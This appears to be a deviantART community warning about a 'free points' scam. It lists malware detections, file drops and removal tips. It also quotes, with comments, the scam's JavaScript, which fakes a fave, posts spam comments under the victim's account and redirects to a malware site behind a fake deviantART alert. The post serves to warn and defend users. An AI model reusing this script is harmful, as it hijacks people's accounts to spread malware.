Stop the "Get 20K points" invasion
Before you do anything stupid, please read this
Obviously, this offer is a swindle.
And as such it is dangerous for you!
Table of contents
- What it does
- And then what ?
- What can we do ?
- "I installed it, but I'm okay"
- "OMG my brother did it !"
- I did not download/run that exe file, am I safe ?
- Connected Viruses/Malware/Adware identified
- Personal investigations
- Any reasonable browser should not be able to execute a downloaded file without warning you first (and the "plugin" stuff is, AFAIK, only a fake div displayed as part of the web page, so it is not harmful by itself)
- I have heard of other, more sophisticated attacks like buffer overflows and such, but I'm not competent enough to tell you whether there is such a threat here. So consider yourself unsafe until someone can tell us whether such a threat exists.
- Identified by Emsisoft as Trojan.MSIL.Spy.Agent.AMN (A)
- Identified by Fortinet as MSIL/Agent.HG!tr.spy
- Identified by ESET-NOD32 as a variant of MSIL/Spy.Agent.HG
- Identified by many other malware detectors as Trojan.GenericKD.966175
- This is a serious threat
- This is a Trojan, which means it is malicious software that spies on your computer and sends (or gives access to) this data to malicious people. See the Internet Holy Bible for reference.
- Some antivirus programs are free. See the Mighty Source of all Truth for reference.
- Fresh news here thanks to ~krisiskiller101's investigations!
- He was able to get rid of it using MalwareBytes
- He confirmed that the RASMan service was up on his computer. However, this service is not supposed to be harmful and might have been up before. It might also be part of the Trojan attack that was not reverted by the fix because it is not harmful alone.
- Thanks for the info!
- Seems to be a recent version of the well-known adware iBryte
- Only Comodo antimalware seems to identify it. Maybe ESET-NOD32 too.
- Be very careful, as searching for "iBryte.H removal" can lead to spywareprotectiontool.com, which is a malicious website giving you malware instead of solutions
- You can find instructions for removing this adware by searching for "iBryte removal", but I don't know if they would work with this version of the adware (please tell us if you have any success with one of these procedures)
- Optimum Installer (fs)
- Might be a false positive
- There are plenty of removal tutorials (please tell us if you have any success with one of them)
- It messes up your registry in a theatrical way
- It probably affects the download manager associated with your web browser
- It probably affects the toolbars in your web browser
- Writes 'test' everywhere in the registry
- Messes with your IE cache
- Creates files
- Creates an executable file named "D2M-Precheck.exe", hidden in "C:\Documents and Settings\Your_User_Name\Local Settings\Temp"
- Creates a DLL file named "check_offer_rp.dll", hidden in the same "C:\Documents and Settings\Your_User_Name\Local Settings\Temp"
- Creates copies of these two files in a subdirectory of "C:\Documents and Settings\Your_User_Name\Local Settings\Temporary Internet Files\Content.IE5\"
- Runs the created exe file, which in turn compromises your computer:
- Creates a new "exe" file named "Impressioner.exe" along with "System.Data.SQLite.dll" and "imp.dat" files, hidden in the same place: "C:\Documents and Settings\Your_User_Name\Local Settings\Temp"
- Transfers data over the internet with the following addresses
- cdn.install.oibundles2.com (the only thing done here is downloading the DLL file mentioned above)
- Probably displays advertising
- There are at least 2 scripts now: mix.js and nr.js (the second one only faves without leaving a comment)
- There are at least two messages spreading this sh*t
- It seems I was totally wrong in thinking that infected people were spreading those messages. It is more probably bots registering and posting every x seconds
- Mutations!
- The scam changed in form. Now has many titles including :
- Free 20k dA Points Is Here!
- dA Points For Free
- Learn How To Get dA Points Instantly!
- Instant Free dA Points!
- Get dA Points Without Buying!
- But the content changed too
- We have a new script: deviantart.hp.af.cm/generator/…
- New script: generator/stript.js
- Looks like they leveled up
- As far as I understand it, it will make your browser all busy and unresponsive, and during this time it will poop comments on as many other submissions as possible
- These comments are more spam messages redirecting to their malware download website
- I think that this script only uses you as a means of spreading the spam and does not lead you to the malware download.
- However, the spam that will be pooped by your account on others' deviations will lead to the malware
- After careful testing (by deactivating the malicious part while keeping the core of the script), I can confirm this, adding that during the browsing/commenting it displays fake information as a cover hiding what is going on.
- It is relatively efficient. During the few seconds (between 5 and 10) of my test I would have posted 5 malicious comments
- If it happened to you
- You should be able to find the scam post where you got caught, as you faved it
- From there, using the "next" button at the top of the screen near the deviantART logo, you will be able to browse the deviations that you have spammed
- Delete/hide your offensive comments
- What do the admins do?!
- ~peppy-heppy asked them and here is the answer he received
- "We've checked over the activity associated with this profile and have found that it does qualify as a type of "spamming" so we have banned this account, along with others we've found to be doing the same. We're currently investigating new methods in dealing with this issue and hopefully bringing it to a stop. Until then, we'll continue to handle the problem as fast as we can.
Please let us know if you find this sort of thing happening again. Thank you!"
Here is what the script does, line by line:

```javascript
// Simulates a click on the "Fave" button.
document.getElementById("gmi-ResourceViewFaveButton").click();
// Writes (in your name) a fake comment saying "It actually works! Wohoooooooo! Thanks!".
document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!";
// Schedules something that hides these actions by reopening the comment area once the comment is posted.
setTimeout("document.getElementsByClassName('ll f').click()", 100);
// Submits the comment (in your name).
// (Quoted as on the page; getElementsByClassName returns a collection, so the real script presumably indexes it, e.g. with [0], before calling click().)
document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit").click();
// Sets up the redirection to their website.
window.top.location.href='deviantart.hp.af.cm/generator';
// Displays an alert claiming to come from deviantART before you are sent there.
alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')
```

See the VirusTotal report.

Now, do as you want.